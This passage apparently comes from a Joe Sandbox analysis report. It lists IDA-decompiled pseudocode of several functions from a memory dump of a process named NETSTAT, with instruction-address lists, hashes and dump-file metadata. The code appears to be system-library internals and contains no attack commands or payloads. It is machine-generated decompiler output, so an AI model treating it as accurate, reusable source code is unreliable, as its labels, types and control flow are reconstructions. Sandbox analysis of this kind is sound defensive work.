								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L033777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03399650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                0x0335c608
                0x0335c615
                0x0335c625
                0x0335c62d
                0x0335c635
                0x0335c640
                0x0335c680
                0x0335c687
                0x0335c688
                0x0335c689
                0x0335c694
                0x0335c694
                0x0335c642
                0x0335c64a
                0x0335c697
                0x033c7a25
                0x033c7a2b
                0x033c7a2e
                0x033c7a30
                0x033c7bea
                0x033c7bea
                0x00000000
                0x033c7bea
                0x033c7a36
                0x033c7a43
                0x033c7a48
                0x033c7a4c
                0x033c7a4e
                0x00000000
                0x00000000
                0x033c7a58
                0x033c7a5a
                0x033c7a5b
                0x033c7a5c
                0x033c7a5d
                0x033c7a63
                0x033c7a64
                0x033c7a6a
                0x033c7a6c
                0x033c7a6e
                0x033c79cb
                0x033c79cb
                0x033c79ce
                0x033c79d0
                0x033c7a98
                0x033c7a9b
                0x033c7a9b
                0x033c7a9e
                0x033c7aa1
                0x033c7bbe
                0x033c7bbe
                0x033c7bc0
                0x033c7be0
                0x033c7be0
                0x033c7a01
                0x033c7a01
                0x033c7a05
                0x033c7a07
                0x033c7a15
                0x033c7a15
                0x033c7a1a
                0x00000000
                0x033c7a1a
                0x033c7bc2
                0x033c7bc6
                0x033c7bc9
                0x033c7bcd
                0x033c7bcf
                0x033c79e6
                0x033c79e6
                0x033c79eb
                0x033c79eb
                0x033c79ef
                0x033c79f1
                0x00000000
                0x00000000
                0x033c79f3
                0x033c79f5
                0x033c79ff
                0x033c79ff
                0x00000000
                0x033c79ff
                0x033c79f7
                0x033c79fd
                0x00000000
                0x00000000
                0x00000000
                0x033c79fd
                0x033c7bd5
                0x033c7bd8
                0x00000000
                0x00000000
                0x033c7ba9
                0x033c7bac
                0x033c7bb0
                0x033c7bb1
                0x033c7bb1
                0x033c7bb6
                0x00000000
                0x033c7bb6
                0x033c7aa7
                0x033c7aaa
                0x00000000
                0x00000000
                0x033c7ab2
                0x033c7ab3
                0x033c7ab5
                0x033c7aec
                0x033c7aef
                0x033c7b25
                0x033c7b28
                0x033c7b62
                0x033c7b64
                0x033c7b8f
                0x033c7b92
                0x033c7b96
                0x033c7b98
                0x00000000
                0x00000000
                0x033c7b9e
                0x033c7b9f
                0x033c7ba3
                0x00000000
                0x033c7ba3
                0x033c7b66
                0x033c7b68
                0x033c7ae2
                0x033c7ae2
                0x00000000
                0x033c7ae2
                0x033c7b6e
                0x033c7b72
                0x033c7b75
                0x033c7b81
                0x033c7b85
                0x033c7b87
                0x00000000
                0x00000000
                0x033c7b31
                0x033c7b34
                0x033c7b3c
                0x033c7b45
                0x033c7b46
                0x033c7b4f
                0x033c7b51
                0x033c7b57
                0x033c7b59
                0x033c7b59
                0x00000000
                0x033c7b59
                0x033c7b77
                0x00000000
                0x033c7b77
                0x033c7b2a
                0x00000000
                0x033c7b2a
                0x033c7af1
                0x033c7af3
                0x00000000
                0x00000000
                0x033c7afb
                0x033c7afc
                0x033c7afe
                0x00000000
                0x00000000
                0x033c7b00
                0x033c7b03
                0x00000000
                0x00000000
                0x033c7b05
                0x033c7b09
                0x033c7b0d
                0x033c7b0f
                0x00000000
                0x00000000
                0x033c7b18
                0x033c7b1d
                0x00000000
                0x033c7b1d
                0x033c7ab7
                0x033c7ab9
                0x00000000
                0x00000000
                0x033c7abf
                0x033c7ac1
                0x00000000
                0x00000000
                0x033c7ac3
                0x033c7ac6
                0x00000000
                0x00000000
                0x033c7ac8
                0x033c7acc
                0x033c7ad0
                0x033c7ad2
                0x00000000
                0x00000000
                0x033c7adb
                0x00000000
                0x033c7adb
                0x033c79d6
                0x033c79d9
                0x033c79dc
                0x033c7a91
                0x033c7a94
                0x00000000
                0x033c7a94
                0x033c79e2
                0x00000000
                0x033c79e2
                0x033c7a74
                0x033c7a7a
                0x00000000
                0x00000000
                0x033c7a8a
                0x033c7a21
                0x033c7a21
                0x00000000
                0x033c7a21
                0x0335c650
                0x0335c651
                0x0335c656
                0x0335c65c
                0x0335c65d
                0x0335c663
                0x0335c664
                0x0335c66a
                0x0335c66e
                0x033c79c5
                0x033c79c7
                0x00000000
                0x033c79c7
                0x0335c67a
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 52552e42132d0ac9d7a73d03a2132ac4ad39f61e7c4c7226ca12e0617beec7b9
                • Instruction ID: 45491e3ce641e20bc2ff531311985b2ba445a9ab186f20570cfaddd793309184
                • Opcode Fuzzy Hash: 52552e42132d0ac9d7a73d03a2132ac4ad39f61e7c4c7226ca12e0617beec7b9
                • Instruction Fuzzy Hash: BF816E79A242819FDB25CE14C8C0E6AB7E9FB84394F18486EED459B340D731ED41CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D6DC9 Relevance: .2, Instructions: 199COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E033D6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E033D6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03377D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03399AE0();
					_t87 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E033D795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E033D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E033D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E033D795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03374620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E033D6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E033D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E033D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E033D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03377D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03399AE0();
								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03372400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03372400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03372400( &_v52);
							}
							if(_v28 >= 0) {
								return L03372400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                0x033d6dd4
                0x033d6dde
                0x033d6de1
                0x033d6de3
                0x033d6de6
                0x033d6de9
                0x033d6dec
                0x033d6def
                0x033d6df2
                0x033d6df5
                0x033d6dfe
                0x033d6e04
                0x033d6e09
                0x033d6e0d
                0x033d6e18
                0x033d6e1b
                0x033d6e22
                0x033d6e2d
                0x033d6e30
                0x033d6e36
                0x033d6e42
                0x033d6e4d
                0x033d6e50
                0x033d6e55
                0x033d6e5c
                0x033d6e6e
                0x033d6e5e
                0x033d6e67
                0x033d6e67
                0x033d6e73
                0x033d6e74
                0x033d6e77
                0x033d6e7c
                0x033d6e7d
                0x033d6e8e
                0x033d6e93
                0x033d6e9c
                0x033d6ea8
                0x033d6eab
                0x033d6eac
                0x033d6eb3
                0x033d6ecd
                0x033d6edc
                0x033d6ee2
                0x033d6ee5
                0x033d6ef2
                0x033d6efb
                0x033d6f01
                0x033d6f06
                0x033d6f0b
                0x033d6f11
                0x033d6f1a
                0x033d6f22
                0x033d6f26
                0x033d6f26
                0x033d6f33
                0x033d6f41
                0x033d6f44
                0x033d6f47
                0x033d6f54
                0x033d6f65
                0x033d6f77
                0x033d6f7c
                0x033d6f82
                0x033d6f91
                0x033d6f99
                0x033d6fa3
                0x033d6fae
                0x033d6fae
                0x033d6fba
                0x033d6fbb
                0x033d6fbc
                0x033d6fc1
                0x033d6fc2
                0x033d6fd3
                0x033d6fd8
                0x033d6fd8
                0x033d6fdf
                0x033d6fe8
                0x033d6fee
                0x033d6fee
                0x033d6ff5
                0x033d6ffb
                0x033d6ffb
                0x033d7004
                0x00000000
                0x033d700a
                0x033d7004
                0x033d6eb3
                0x033d6e9c
                0x033d7015

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                • Instruction ID: d60114821141914a2d12df7eaa00f9e9e9341be3174a9b5d377a1f0375e60099
                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                • Instruction Fuzzy Hash: 8A718C76E00209EFCB10DFA5D984AEEBBB8FF48300F144469E505EB290DB34EA41CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033EB8D0 Relevance: .2, Instructions: 199COMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E033EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3447b9c; // 0x0
				_t124 = L03374620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03399800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E033995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E033995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L033777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03399910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E033995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3447b9c; // 0x0
									_t92 = L03374620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03399910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0335A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E033EE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E033EE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E033995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                0x033eb8d9
                0x033eb8e4
                0x00000000
                0x033eb8e6
                0x033eb8f3
                0x033eb8f5
                0x033eb8f5
                0x033eb8f8
                0x033eb920
                0x033eb924
                0x033eb936
                0x033eb939
                0x033eb93d
                0x033eb948
                0x033eb9a0
                0x033eb9a0
                0x033eb9a4
                0x033eb9bf
                0x033eb9c4
                0x033eb9c6
                0x033eb9cd
                0x033eb9d1
                0x033ebad4
                0x033ebad8
                0x033ebada
                0x033ebadc
                0x033ebadc
                0x033ebadf
                0x033ebae0
                0x033ebae2
                0x033ebae4
                0x033ebaec
                0x033ebaee
                0x033ebaf0
                0x033ebaf0
                0x033ebaec
                0x033ebafb
                0x033ebafc
                0x033ebafe
                0x033ebb01
                0x033ebb01
                0x00000000
                0x033ebb06
                0x033eb9d7
                0x033eb9db
                0x033eb9db
                0x033eb9de
                0x033eb9de
                0x033eb9e4
                0x033eb9e7
                0x033eb9ea
                0x033eb9ec
                0x033eb9ef
                0x033eb9f3
                0x033eba1b
                0x033eba1b
                0x033eba23
                0x033eba24
                0x033eba27
                0x033eba2a
                0x033eba2b
                0x033eba2e
                0x033eba30
                0x033eba37
                0x033eba3f
                0x033eba9c
                0x033ebaa2
                0x033ebb13
                0x033ebb15
                0x033ebaae
                0x033ebaae
                0x033ebab3
                0x033ebab5
                0x033ebaba
                0x033ebac8
                0x033ebac8
                0x033ebaba
                0x033ebacd
                0x033ebacf
                0x00000000
                0x033ebacf
                0x033ebb1a
                0x00000000
                0x033ebb1c
                0x033ebaa7
                0x033ebb11
                0x00000000
                0x033ebb11
                0x033ebaa9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033eba41
                0x033eba41
                0x033eba41
                0x033eba58
                0x033eba5d
                0x033eba62
                0x00000000
                0x00000000
                0x033eba64
                0x033eba67
                0x033eba68
                0x033eba69
                0x033eba6c
                0x033eba6f
                0x033eba71
                0x033eba78
                0x033eba80
                0x00000000
                0x00000000
                0x033eba90
                0x033eba90
                0x033eba97
                0x00000000
                0x033eba97
                0x033eb9f5
                0x033eb9f7
                0x033eb9f7
                0x033eb9fa
                0x033eba03
                0x033eba07
                0x033eba0c
                0x033eba10
                0x033eba17
                0x00000000
                0x033eb9f7
                0x033eb9a6
                0x033eb9a8
                0x033eb9af
                0x033eb9b3
                0x00000000
                0x00000000
                0x033eb9b9
                0x00000000
                0x033eb9b9
                0x033eb94d
                0x033eb98f
                0x033eb995
                0x033eb999
                0x033eb960
                0x033eb967
                0x033eb968
                0x033eb96a
                0x00000000
                0x033eb96a
                0x033eb99b
                0x033eb99e
                0x00000000
                0x00000000
                0x00000000
                0x033eb99e
                0x033eb951
                0x033eb954
                0x033eb95a
                0x033eb95e
                0x033eb972
                0x033eb979
                0x033eb97d
                0x033eb97f
                0x033eb980
                0x033eb982
                0x033eb984
                0x00000000
                0x033eb984
                0x00000000
                0x033eb926
                0x00000000
                0x033eb926

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c28c8a5e1f8a6d4b6ed799e4981292f6d71077fd703a18ce8f73106f9304ebe
                • Instruction ID: 532a15018bc4f64e78a4ab57d3ab108793bfbba0436fe0a721d93af4fa8ec1be
                • Opcode Fuzzy Hash: 1c28c8a5e1f8a6d4b6ed799e4981292f6d71077fd703a18ce8f73106f9304ebe
                • Instruction Fuzzy Hash: 5371EB36604712EFEB32DF14CC80F66FBA9EB40720F184528E6559B6E0DB74E941CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033552A5 Relevance: .2, Instructions: 161COMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E033552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0336EEF0(0x34479a0);
					_t104 =  *0x3448210; // 0xb32bd8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0336EB70(_t93, 0x34479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03399890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0336EEF0(0x34479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0336EB70(0, 0x34479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xb32be5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0338F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0336EEF0(0x34479a0);
									__eflags =  *0x3448210 - _t104; // 0xb32bd8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3448210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E033D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0336EB70(_t95, 0x34479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E033995D0();
											L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E033995D0();
											L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0336EB70(_t93, 0x34479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E033995D0();
										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E033995D0();
										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0338F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                0x033552a5
                0x033552ad
                0x033552b0
                0x033552b3
                0x033552b7
                0x033552ba
                0x033552bf
                0x033552c4
                0x033552cc
                0x00000000
                0x00000000
                0x033552ce
                0x033552d9
                0x033552dd
                0x033552e7
                0x033552f7
                0x033552f9
                0x033552fd
                0x033b0dcf
                0x033b0dd5
                0x033b0dd6
                0x033b0dd7
                0x033b0dd8
                0x033b0dd9
                0x033b0dde
                0x033b0ddf
                0x033b0de0
                0x033b0de1
                0x033b0de2
                0x033b0de5
                0x033b0dea
                0x033b0dec
                0x033b0f60
                0x033b0f64
                0x033b0f70
                0x033b0f76
                0x033b0f79
                0x033b0f79
                0x00000000
                0x033b0f64
                0x033b0df2
                0x033b0df7
                0x033b0e04
                0x033b0e0d
                0x033b0e0d
                0x033b0e10
                0x033b0e1a
                0x033b0e1c
                0x033b0e4c
                0x033b0e52
                0x033b0e61
                0x033b0e67
                0x033b0e6b
                0x033b0e70
                0x033b0e76
                0x033b0ed7
                0x033b0edc
                0x033b0ee0
                0x033b0ee6
                0x033b0eea
                0x033b0eed
                0x033b0ef0
                0x033b0ef3
                0x033b0ef6
                0x033b0ef9
                0x033b0efe
                0x033b0f01
                0x033b0f01
                0x033b0f0b
                0x033b0f12
                0x033b0f16
                0x033b0f18
                0x033b0f1b
                0x033b0f2c
                0x033b0f31
                0x033b0f31
                0x033b0f35
                0x033b0f39
                0x033b0f3a
                0x033b0f3c
                0x033b0f3f
                0x033b0f50
                0x033b0f55
                0x033b0f55
                0x033b0f59
                0x033552eb
                0x033552f1
                0x033552f1
                0x033b0e7d
                0x033b0e84
                0x033b0e88
                0x033b0e8a
                0x033b0e8d
                0x033b0e9e
                0x033b0ea3
                0x033b0ea3
                0x033b0ea7
                0x033b0eaf
                0x033b0eb3
                0x033b0eb9
                0x033b0eb9
                0x033b0ebc
                0x033b0ecd
                0x033b0ecd
                0x00000000
                0x033b0eb3
                0x033b0e21
                0x033b0e2b
                0x033b0e2f
                0x033b0e30
                0x033b0e3a
                0x033b0e3f
                0x033b0e41
                0x00000000
                0x00000000
                0x033b0e47
                0x00000000
                0x033b0e47
                0x033b0df9
                0x033b0dfe
                0x00000000
                0x00000000
                0x00000000
                0x033b0dfe
                0x03355303
                0x03355307
                0x00000000
                0x03355309
                0x00000000
                0x03355309
                0x03355307
                0x033552e9
                0x033552e9
                0x00000000
